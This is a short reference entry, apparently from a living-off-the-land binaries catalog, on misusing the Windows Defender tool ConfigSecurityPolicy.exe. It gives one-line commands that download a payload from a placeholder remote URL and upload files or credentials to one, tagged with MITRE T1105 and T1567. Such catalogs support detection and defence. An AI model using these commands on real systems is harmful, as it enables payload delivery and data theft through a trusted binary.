ConfigSecurityPolicy.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Download

Downloads payload from remote server

ConfigSecurityPolicy.exe {REMOTEURL}

It will download a remote payload and place it in INetCache. — MITRE: T1105 — Privileges: User

Upload

Upload file

ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}

Upload file, credentials or data exfiltration in general — MITRE: T1567 — Privileges: User